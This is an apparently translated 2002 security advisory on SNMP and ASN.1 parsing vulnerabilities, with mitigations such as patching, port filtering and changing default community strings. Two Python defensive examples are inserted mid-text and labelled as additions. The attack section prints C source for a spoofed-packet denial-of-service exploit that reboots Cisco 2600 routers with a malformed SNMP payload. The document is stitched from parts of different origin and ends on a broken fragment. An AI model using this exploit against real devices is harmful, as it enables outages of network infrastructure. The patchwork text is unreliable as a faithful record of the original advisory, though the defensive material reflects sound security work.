Multiple vulnerabilities in SNMP protocol implementations
Source: CNNS.NET Category: System Vulnerability Date: 2002-6-22 8:08:04
Affected programs:
SNMP protocol and various network equipment
Description:
The SNMP protocol implementation mechanism has multiple vulnerabilities that seriously harm the Internet infrastructure.
Details:
Background:
ASN.1 (Abstract Syntax Notation One) is a standard for describing abstract data types; since 1984 it has been used to define and transmit complex data structures. Many communication protocols and applications of the 1980s derive from this language, which underlies the network infrastructure signalling of the telecommunications, electric power and nuclear power industries, and it is also one of the foundational rules on which the Internet runs. Computer security experts worldwide are investigating the security weaknesses of ASN.1. These vulnerabilities seriously threaten the Internet infrastructure: hackers could develop attack programs that shut down ISP backbone routers, switches and many other basic network devices, and the ultimate destructive consequence could bring down the Internet.
Computer security experts in industry and government are concerned about these issues. In 1999, CNNS security experts found that many of the telecom operators' backbone routers had fatal defects; at that time a single simple operation could cause a large-scale network outage. As an example, a significant vulnerability appeared at China Chunghwa Telecom in 1999: had a hacker exploited it, approximately 65% of users would have been unable to go online.
Because of the security weaknesses of ASN.1, more than 100 network equipment vendors will pay a price: the cost of fixing these defects will exceed $100 million.
Hundreds of network equipment vendors were warned early this year, and solutions have now been provided.
Because multiple Internet communication protocols are built on the ASN.1 network language, the vulnerability of ASN.1 broadly threatens the communications industry. The most significant example is the multiple security vulnerabilities it causes in the SNMP protocol. The same problem also affects at least three other Internet protocols, which are not detailed here.
The Oulu University Secure Programming Group (OUSPG, http://www.ee.oulu.fi/research/ouspg/) has long focused on research into the SNMP protocol and disclosed this serious series of security flaws.
Multiple vulnerabilities caused by the fragility of the protocol may allow unauthorized access, denial-of-service attacks and unstable operation. The Simple Network Management Protocol (SNMP) is widely used to monitor and manage network devices. SNMPv1 defines several types of SNMP message, such as requests for information, configuration changes, responses to requests, SNMP objects, and unsolicited alerts (traps).
1. Flaws in SNMPv1 trap message handling. SNMP agents send trap messages (SNMP TRAP messages) to the manager to report errors, alerts and other status information about the host. The manager must parse and process this data, and OUSPG found that many SNMP managers have defects when parsing and processing it.
2. Flaws in SNMPv1 request message handling. SNMP request messages are sent from the manager to the SNMP agent; they are used to obtain information from the agent or to instruct the agent to configure device parameters. The agent must decode and process these messages correctly. During decoding and subsequent processing, both agents and managers exhibit denial-of-service errors, format string errors and buffer overflows. Some attacks do not even require the correct SNMP Community String (a key parameter of the SNMP configuration, somewhat like a password).
These vulnerabilities can lead to denial of service and service interruption, and in some cases allow an attacker to gain unauthorized access to a device. The impact differs from product to product.
Solution: This site lists the responses of more than 100 companies to this security issue and related information: http://www.cnns.net/patch/vendor.htm
Note that the following security measures may significantly affect your day-to-day network maintenance and network configuration. Make sure that the results of these measures do not affect network performance.
1. Obtain the patch from the vendor and apply it. http://www.cnns.net/patch/vendor.htm provides information about this security issue.
2. Disable the SNMP service. CNNS recommends that you disable all unnecessary services, including SNMP. Unfortunately, some products behave unexpectedly or deny service when the SNMP service is disabled. If this is the case, you must apply more advanced security settings.
3. Boundary access filtering. A temporary measure is to block bad traffic at the network boundary, whether entering the internal network or leaving for the external network. For network managers, a stronger measure is to control requests to SNMP services through filtering devices such as firewalls: for example, deny requests to the SNMP service by default except from designated servers. Filter the following ports so that external attackers cannot launch SNMP attacks against the internal network:

    snmp  161/udp  # Simple Network Management Protocol (SNMP)
    snmp  162/udp  # SNMP system management messages (traps)

The following services are less common, but some products may run them:

    snmp             161/tcp   # Simple Network Management Protocol (SNMP)
    snmp             162/tcp   # SNMP system management messages (traps)
    smux             199/tcp   # SNMP Unix Multiplexer
    smux             199/udp   # SNMP Unix Multiplexer
    synoptics-relay  391/tcp   # SynOptics SNMP Relay Port
    synoptics-relay  391/udp   # SynOptics SNMP Relay Port
    agentx           705/tcp   # AgentX
    snmp-tcp-port    1993/tcp  # Cisco SNMP TCP port
    snmp-tcp-port    1993/udp  # Cisco SNMP TCP port

When filtering requests to these services, take care not to affect normal network operation. Note that the SNMP daemon may bind to all IP addresses on a device, so the packet filtering policy must be designed carefully. For example, even if SNMP packets sent directly to the ordinary network addresses are blocked, an attack may still be possible, because attackers can use SNMP defects against special network addresses such as network broadcast addresses and loopback addresses (127.x.x.x); loopback addresses are often used by routers for administrative purposes. Administrators can consider whether to filter these packets as well, but must be cautious, because improper settings may affect network performance. Finally, access to the following RPC services can also be restricted:

    Name       Program ID  Alias
    snmp       100122      na.snmp snmp-cmc snmp-synoptics snmp-unisys snmp-utk
    snmpv2     100138      na.snmpv2  # SNM version 2.2.2
    snmpxdmid  100249

Note that these measures are ineffective against internal attacks.
4. Filter abnormal SNMP access within the internal network. In many networks only a limited number of network management systems need to issue SNMP requests. Accordingly, most SNMP agents can be configured to accept SNMP requests only from a limited set of hosts, which reduces the risk of internal attack. These measures must likewise be applied with care, since inappropriate settings reduce network performance.
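The boundary filter of step 3 and the internal whitelist of step 4 can be written down as one policy and checked against traffic records before it is deployed. The following Python is an added example, not code from the advisory or from CNNS: it encodes the advisory's port list, drops SNMP from external sources and to broadcast or loopback destinations, accepts requests only from the management station and traps only to it, and returns a verdict per flow. The subnets 10.0.0.0/24 to 10.0.2.0/24, the management station 10.0.0.5 and the record format "SRC > DST PROTO DPORT" are assumptions constructed for the example.

```python
"""SNMP packet-filter policy evaluated over constructed flow records.

Added example, not from the advisory: it encodes the boundary filtering
(step 3) and internal whitelisting (step 4) as a policy and returns a verdict
per flow. The subnets, management station and log lines are constructed for
this example."""
import ipaddress

# Services from the advisory's port list (CA-2002-03).
SNMP_PORTS = {
    ("udp", 161), ("tcp", 161),      # snmp
    ("udp", 162), ("tcp", 162),      # snmp traps
    ("tcp", 199), ("udp", 199),      # smux
    ("tcp", 391), ("udp", 391),      # synoptics-relay
    ("tcp", 705),                    # agentx
    ("tcp", 1993), ("udp", 1993),    # snmp-tcp-port (Cisco)
}
TRAP_PORT = 162

# Constructed policy: internal subnets and the one authorised management station.
INTERNAL_SUBNETS = [ipaddress.ip_network(n) for n in
                    ("10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24")]
MANAGERS = {ipaddress.ip_address("10.0.0.5")}
LOOPBACK = ipaddress.ip_network("127.0.0.0/8")
LIMITED_BROADCAST = ipaddress.ip_address("255.255.255.255")


def is_internal(addr):
    return any(addr in net for net in INTERNAL_SUBNETS)


def is_special_destination(addr):
    """Broadcast and loopback destinations: the advisory notes SNMP daemons may
    listen on every address, so these must be filtered as well as unicast ones."""
    if addr in LOOPBACK or addr == LIMITED_BROADCAST:
        return True
    return any(addr == net.broadcast_address for net in INTERNAL_SUBNETS)


def parse_flow(line):
    """Parse the constructed record format 'SRC > DST PROTO DPORT'."""
    src, arrow, dst, proto, dport = line.split()
    if arrow != ">":
        raise ValueError(f"bad record: {line!r}")
    return (ipaddress.ip_address(src), ipaddress.ip_address(dst),
            proto.lower(), int(dport))


def verdict(src, dst, proto, dport):
    """Apply the policy in order; the first matching rule decides."""
    if (proto, dport) not in SNMP_PORTS:
        return "not-snmp"
    if is_special_destination(dst):
        return "drop: broadcast/loopback destination"
    if not is_internal(src):
        return "drop: external source"                # step 3, border filter
    if dport == TRAP_PORT:                            # agent -> manager traps
        return "allow" if dst in MANAGERS else "drop: trap to non-manager"
    if src not in MANAGERS:
        return "drop: unauthorised internal source"   # step 4, agent whitelist
    return "allow"


def evaluate(lines):
    """Return [(record, verdict), ...] for a batch of flow records."""
    return [(line, verdict(*parse_flow(line))) for line in lines]


# Constructed sample records.
SAMPLE_FLOWS = [
    "10.0.0.5 > 10.0.1.1 udp 161",       # management station polling a router
    "10.0.2.7 > 10.0.1.1 udp 161",       # internal host that is not a manager
    "198.51.100.9 > 10.0.1.1 udp 161",   # external source
    "10.0.0.5 > 10.0.1.255 udp 161",     # subnet broadcast
    "198.51.100.9 > 127.0.0.1 udp 161",  # loopback destination from outside
    "10.0.1.1 > 10.0.0.5 udp 162",       # trap from agent to manager
    "10.0.1.1 > 10.0.2.9 udp 162",       # trap to a non-manager
    "10.0.0.5 > 10.0.1.1 tcp 1993",      # Cisco SNMP over TCP
    "10.0.0.5 > 10.0.1.1 tcp 22",        # unrelated traffic
]

if __name__ == "__main__":
    for record, result in evaluate(SAMPLE_FLOWS):
        print(f"{record:32s} {result}")
```

The rule order matters: the special-destination check runs before the source check so that a packet aimed at a broadcast or loopback address is dropped regardless of where it came from, which is the case the advisory warns a plain unicast filter misses.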
5. Change the default "Community String". On devices that support the SNMP service, the factory-default Community Strings are "public" (read-only) and "private". CNNS strongly recommends that users change both default strings; otherwise an attacker will be able to modify the device's settings via the SNMP protocol. After changing these two default "passwords", sniffing attacks must still be prevented so that attackers cannot capture the new "passwords". SNMPv3 improves on this; see RFC 2574.
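The two defects above, decoding that trusts the lengths a message declares, and the factory-default community strings, can both be checked at the receiving end. The following Python is an added example, not code from the advisory or from OUSPG: a minimal SNMPv1 BER decoder whose every declared length is checked against the bytes that remain, so a message that claims more data than it carries is rejected rather than read past the buffer, plus a check that flags "public"/"private" and SetRequest PDUs. The sample messages, the site community "netmon-ro" and the helper that builds them are constructed for this example.

```python
"""Defensive SNMPv1 (BER) message decoder with length checks.

Added example, not code from the advisory or from OUSPG: it shows the decoding
step that the advisory says agents and managers got wrong, done with explicit
bounds checks, and flags the factory-default community strings. The sample
messages below are constructed for this example."""

DEFAULT_COMMUNITIES = {b"public", b"private"}
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap"}


class SnmpParseError(ValueError):
    """Raised for any message that does not fit its own declared lengths."""


def read_tlv(buf, pos):
    """Read one BER tag-length-value at buf[pos]; return (tag, value, next_pos).

    Every declared length is checked against the bytes that remain, so a
    message claiming more data than it carries is rejected instead of read."""
    if pos + 2 > len(buf):
        raise SnmpParseError("truncated: missing tag or length byte")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:                      # short form: one length byte
        length = first
    else:                                 # long form: 0x8N then N length bytes
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 4:
            raise SnmpParseError("unsupported length encoding")
        if pos + nbytes > len(buf):
            raise SnmpParseError("truncated: length bytes missing")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise SnmpParseError(f"length {length} exceeds remaining {len(buf) - pos} bytes")
    return tag, buf[pos:pos + length], pos + length


def parse_snmpv1(msg):
    """Decode the outer SNMPv1 message: version, community and PDU."""
    tag, body, end = read_tlv(msg, 0)
    if tag != 0x30:
        raise SnmpParseError("outer element is not a SEQUENCE")
    if end != len(msg):
        raise SnmpParseError("trailing bytes after message")
    tag, ver, pos = read_tlv(body, 0)
    if tag != 0x02 or len(ver) != 1:
        raise SnmpParseError("bad version field")
    tag, community, pos = read_tlv(body, pos)
    if tag != 0x04:
        raise SnmpParseError("bad community field")
    pdu_tag, pdu, pos = read_tlv(body, pos)
    if pdu_tag not in PDU_NAMES:
        raise SnmpParseError(f"unknown PDU tag {pdu_tag:#x}")
    return {"version": ver[0], "community": bytes(community),
            "pdu_type": PDU_NAMES[pdu_tag], "pdu": bytes(pdu)}


def check_message(msg):
    """Return a list of findings for one raw SNMP datagram (empty = nothing notable)."""
    try:
        m = parse_snmpv1(msg)
    except SnmpParseError as err:
        return [f"MALFORMED: {err}"]
    findings = []
    if m["version"] != 0:
        findings.append(f"version {m['version']} is not SNMPv1")
    if m["community"] in DEFAULT_COMMUNITIES:
        findings.append(f"default community {m['community'].decode()!r}")
    if m["pdu_type"] == "SetRequest":
        findings.append("SetRequest (configuration change)")
    return findings


def tlv(tag, value):
    """Encode one BER element (short form below 128 bytes, long form above)."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    if n < 0x100:
        return bytes([tag, 0x81, n]) + value
    return bytes([tag, 0x82]) + n.to_bytes(2, "big") + value


def build_request(community, oid, pdu_tag=0xA0, request_id=1):
    """Build a well-formed SNMPv1 request with one null-valued varbind."""
    varbinds = tlv(0x30, tlv(0x30, tlv(0x06, oid) + tlv(0x05, b"")))
    pdu = tlv(pdu_tag, tlv(0x02, bytes([request_id])) + tlv(0x02, b"\x00")
              + tlv(0x02, b"\x00") + varbinds)
    return tlv(0x30, tlv(0x02, b"\x00") + tlv(0x04, community) + pdu)


# Constructed samples: sysDescr.0 (1.3.6.1.2.1.1.1.0) under a hypothetical site
# community "netmon-ro", the factory defaults, and two damaged encodings.
SYSDESCR_0 = b"\x2b\x06\x01\x02\x01\x01\x01\x00"
GOOD = build_request(b"netmon-ro", SYSDESCR_0)
DEFAULT_GET = build_request(b"public", SYSDESCR_0)
DEFAULT_SET = build_request(b"private", SYSDESCR_0, pdu_tag=0xA3)
TRUNCATED = DEFAULT_GET[:-4]                               # declared length > data
OVERLONG = bytes([0x30, 0x81, 0xAF]) + DEFAULT_GET[2:]      # outer length claims 175 bytes

if __name__ == "__main__":
    for name, raw in [("good", GOOD), ("default-get", DEFAULT_GET),
                      ("default-set", DEFAULT_SET), ("truncated", TRUNCATED),
                      ("overlong", OVERLONG)]:
        print(f"{name:12s} {check_message(raw)}")
```

The decoder stops at the outer message; a production agent would walk the varbind list with the same read_tlv and the same bounds rule. The point is that an OID or string whose declared length runs past the datagram is refused before any byte of it is copied, which is the class of error the PROTOS-style test messages triggered.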
6. Isolate SNMP packets. From a network management perspective, isolation measures reduce the risk of SNMP attacks; they include physical isolation, VLAN logical isolation and VPN-based isolation. Note that VLAN isolation on a switch increases the difficulty for attackers but in theory does not completely eliminate such attacks.
Attack method: Example: 1. If an attacker obtains the "Community String" of a device supporting the SNMP protocol, then in a suitable environment the attacker can: 1. modify the router configuration; 2. obtain the highest level of control of the server; 3. restart the device.
Second, an attacker can also mount a denial-of-service attack without first obtaining the "Community String". The following code restarts a Cisco 2600 router:

    /* This program sends a spoofed SNMPv1 GET request that causes a system reboot
       on Cisco 2600 routers with IOS version 12.0(10).
       Author: kundra@tiscali.it ... don't be lame us, for testing only! .. :) */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <netinet/udp.h>
    #include <arpa/inet.h>

    struct in_addr sourceip_addr;
    struct in_addr destip_addr;
    struct sockaddr_in dest;
    struct ip *ip;
    struct udphdr *udp;
    int p_number = 1, sok, datasize, i = 0;
    char *packet, *source, *target;
    char *packetck;
    char *data, c;

    /* Malformed SNMPv1 GetRequest: community "public" followed by an over-long
       OID made of "%s" bytes (format string) and an oversized length field. */
    char snmpkill[] =
        "\x30\x81\xaf\x02\x01\x00\x04\x06\x70\x75\x62\x6c\x69\x63\x0\x81"
        "\xa1\x02\x02\x09\x28\x02\x01\x00\x02\x01\x00\x30\x81\x94\x30\x81"
        "\x91\x06\x81\x8c\x4d\x73\x25\x25\x25\x25\x73\x25\x73"
        "\x25\x73\x25\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
        "\x25\x73\x25\x73\x25\x25\x73\x25\x73\x25\x73\x25\x73"
        "\x25\x73\x25\x25\x25\x25\x73\x25\x73\x25\x73\x25\x73"
        "\x25\x25\x25\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
        "\x25\x73\x25\x73\x25\x25\x25\x25\x73\x25\x73\x25\x73"
        "\x25\x25\x25\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
        "\x25\x73\x25\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
        "\x25\x73\x25\x73\x25\x73\x81\xff\xff\xff\xff\xff\xff\xff\xff\x7f"
        "\x05";

    /* Pseudo-header used for the UDP checksum. */
    struct pseudoudp {
        u_long  ipsource;
        u_long  ipdest;
        char    zero;
        char    proto;
        u_short length;
    } *psudp;

    unsigned short in_cksum(unsigned short *ptr, int nbytes)
    {
        register long sum;          /* assumes long == 32 bits */
        u_short oddbyte;
        register u_short answer;    /* assumes u_short == 16 bits */

        /*
         * Our algorithm is simple, using a 32-bit accumulator (sum),
         * we add sequential 16-bit words to it, and at the end, fold back
         * all the carry bits from the top 16 bits into the lower 16 bits.
         */
        sum = 0;
        while (nbytes > 1) {
            sum += *ptr++;
            nbytes -= 2;
        }

        /* mop up an odd byte, if necessary */
        if (nbytes == 1) {
            oddbyte = 0;                                /* make sure top half is zero */
            *((u_char *) &oddbyte) = *(u_char *) ptr;   /* one byte only */
            sum += oddbyte;
        }

        /* Add back carry outs from top 16 bits to low 16 bits. */
        sum = (sum >> 16) + (sum & 0xffff);  /* add high-16 to low-16 */
        sum += (sum >> 16);                  /* add carry */
        answer = ~sum;                       /* ones-complement, then truncate to 16 bits */
        return (answer);
    }

    void usage(void)
    {
        printf("kundera ciscokill v1.0\n");
        printf("usage: ciscokill [-n number of packets] [-s source ip_addr] -t ip_target\n");
    }

    int main(int argc, char **argv)
    {
        if (argc < 2) {
            usage();
            exit(1);
        }
        while ((c = getopt(argc, argv, "s:t:n:")) != EOF) {
            switch (c) {
            case 's': source = optarg; break;
            case 'n': p_number = atoi(optarg); break;
            case 't': target = optarg;
            }
        }
        if ((sok = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
            printf("can't create socket.\n");
            exit(EXIT_FAILURE);
        }
        destip_addr.s_addr = inet_addr(target);
        sourceip_addr.s_addr = inet_addr(source);
        datasize = sizeof(snmpkill);
        packet = (char *) malloc(20 + 8 + datasize);
        ip = (struct ip *) packet;
        memset(packet, 0, 20 + 8 + datasize);   /* zero the whole buffer, not just the pointer */

        /* IP header: spoofed source, UDP payload */
        ip->ip_dst.s_addr = destip_addr.s_addr;
        ip->ip_src.s_addr = sourceip_addr.s_addr;
        ip->ip_v = 4;
        ip->ip_hl = 5;
        ip->ip_ttl = 245;
        ip->ip_id = htons(666);
        ip->ip_p = 17;
        ip->ip_len = htons(20 + 8 + datasize);
        ip->ip_sum = in_cksum((u_short *) packet, 20);

        /* UDP header to port 161 */
        udp = (struct udphdr *) (packet + 20);
        udp->source = htons(666);
        udp->dest = htons(161);
        udp->len = htons(8 + datasize);
        udp->check = 0;

        /* UDP checksum over pseudo-header + UDP header + payload */
        packetck = (char *) malloc(8 + datasize + sizeof(struct pseudoudp));
        bzero(packetck, 8 + datasize + sizeof(struct pseudoudp));
        psudp = (struct pseudoudp *) packetck;
        psudp->ipdest = destip_addr.s_addr;
        psudp->ipsource = sourceip_addr.s_addr;
        psudp->zero = 0;
        psudp->proto = 17;
        psudp->length = htons(8 + datasize);
        memcpy(packetck + sizeof(struct pseudoudp), udp, 8 + datasize);
        memcpy(packetck + sizeof(struct pseudoudp) + 8, snmpkill, datasize);
        udp->check = in_cksum((u_short *) packetck, 8 + datasize + sizeof(struct pseudoudp));

        data = (packet + 20 + 8);
        memcpy(data, snmpkill, datasize);
        dest.sin_family = AF_INET;
        dest.sin_addr.s_addr = destip_addr.s_addr;

        while (i < p_number) {
            /* send call is missing from the source text */
            i++;
        }
        printf("%d packets sent.\n", i);
    }

Security suggestions: In the case of allowing the SNMP protocol
Additional information:
http://www.kb.cert.org/vuls/id/854306
http://www.kb.cert.org/vuls/id/107186
CA-2002-03
http://online.wsj.com/article_email/0,sb1023731908761703280,00.html